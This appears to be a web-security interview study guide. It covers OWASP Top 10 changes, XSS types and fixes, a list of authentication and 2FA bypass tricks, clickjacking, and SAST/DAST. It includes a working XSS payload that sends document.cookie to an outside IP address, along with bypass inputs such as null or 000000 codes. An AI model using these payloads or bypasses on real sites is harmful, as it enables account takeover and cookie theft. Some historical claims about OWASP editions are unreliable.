OWASP (Open Web Application Security Project) Top 10 is a list of vulnerability categories used to identify web application based attacks.
In total it lists the 10 most common web application attack categories.
It was first updated in 2013 and then in 2017, and the 2017 version is still the one in use today.
There are 4 major changes:
IDOR (Insecure Direct Object References) + MFLAC (Missing Function Level Access Control) = BAC (Broken Access Control)
Newly added: XXE (XML External Entities) was added in 2017
Insecure Deserialization was added in 2017
Insufficient Logging and Monitoring was added in 2017
You can name any 1 or 2 bugs from the OWASP Top 10, for example:
1.XSS
2.Authentication Bypass
Why XSS?
Because the majority of applications use JavaScript and XSS is a JavaScript-based issue.
XSS is when an attacker is able to load arbitrary, attacker-supplied JavaScript code into a web app and the web app executes it.
There are 3 types: Reflected, Stored and DOM-based.
Reflected: if a payload injected into the web application is reflected back in the response and executed, it is reflected XSS.
Stored: if a payload injected into the web application is stored by the application and executed whenever a user loads the affected page, it is stored XSS.
DOM-based: if a payload enters the page through a source (such as the URL) and reaches a DOM sink without being sanitized, it is DOM-based XSS.
In this case vulnerable sinks are: innerHTML, document.location, document.domain.
If alert is blocked, then confirm, prompt or print can be used as a payload.
<script>alert(document.cookie)</script>
1. As we can load and execute our supplied JavaScript in the web app, we can steal the user's cookies and perform an Account Takeover (ATO).
2. We will use a document.cookie payload, which reads the cookie, and redirect the browser to the attacker's server with the cookie in the request, so the cookie can be collected from our server logs.
Final payload: <ScRipt>document.location.href="http://192.168.0.106:5000/?c="+document.cookie;</script>
Note: We can also take a screenshot of the victim machine using XSS.
XSS is fixed by HTML encoding the output. We will not use blacklisting of payloads, because a blacklist can be bypassed easily and we would not be able to write a strict enough regex.
Note: Whitelisting input can also be used sometimes, but HTML encoding, or otherwise preventing the payload from breaking out of the surrounding JS code, should be implemented.
Authentication bypass is when an attacker can bypass the username/password or authentication/login flow of the website. Because it gives full access to any user's account, it is considered a dangerous, high severity attack.
Different types of Auth Bypass:
1. Login Bypass: in this we generally bypass the username and password check
2. Response Manipulation: (false to true), (0 to 1)
3. Status Code Manipulation: from 403 Forbidden to 200 OK
4. OTP Bypass: which is done by brute forcing
5. Captcha Bypass: which is done by response manipulation
6. Code leakage in JS file: rare, but some JS files may contain info about the 2FA code
7. 2FA Code Reuse: the same code can be reused (the same code works for the same device) / sequential OTPs
8. No Brute Force Protection: possible to brute-force a 2FA code of any length
9. Missing 2FA Code Integrity Validation: a code issued for any user account can be used to bypass the 2FA (I use my OTP to bypass your verification)
10. CSRF on 2FA Disabling: no CSRF protection on disabling 2FA, and also no re-authentication confirmation
11. Password Reset Disables 2FA: 2FA gets disabled on password change / email change
12. Bypass 2FA with null or 000000: enter "null" as the 2FA code -> enter 000000 as the 2FA code -> send an empty 2FA code
Clickjacking happens due to the absence of the X-Frame-Options header. Setting the X-Frame-Options header or using frame busters will fix the clickjacking issue.
SAST stands for Static Application Security Testing and DAST stands for Dynamic Application Security Testing.
In SAST we check the source code, i.e. we do static analysis of the code.
In DAST we check the dynamic requests sent between client and server.
White Box: in this type of testing we have all the information about the target from the client. We are aware of the underlying technology, IPs and other details like the DB (database) version, architecture, etc., and a walkthrough is provided to understand how the app works.
Grey Box: same as above, but only limited information is provided.
Black Box: we do not have much information about the target stack (technology, etc.); only the IP address or domain name is given by the client. This is comparable to what we do when performing bug bounty hunting.
Note: This is the first part of the article and there will be more upcoming parts with more questions.